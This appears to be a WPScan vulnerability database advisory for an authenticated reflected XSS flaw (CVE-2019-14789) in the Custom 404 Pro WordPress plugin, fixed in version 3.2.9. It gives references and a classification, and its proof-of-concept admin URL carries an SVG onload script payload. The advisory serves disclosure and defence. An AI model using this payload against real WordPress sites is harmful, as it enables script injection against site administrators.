Custom 404 Pro < 3.2.9 - Authenticated Reflected XSS



Proof of Concept
Version <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s="><svg/onload=alert(/XSS/)>

Affects Plugin

fixed in version 3.2.9

References

CVE 2019-14789
URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2112485%40custom-404-pro&old=2087395%40custom-404-pro

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 2434
Verified No
WPVDB ID 9382

Timeline

Publicly Published 2019-06-24 (5 months ago)
Added 2019-06-24 (5 months ago)
Last Updated 2019-08-30 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin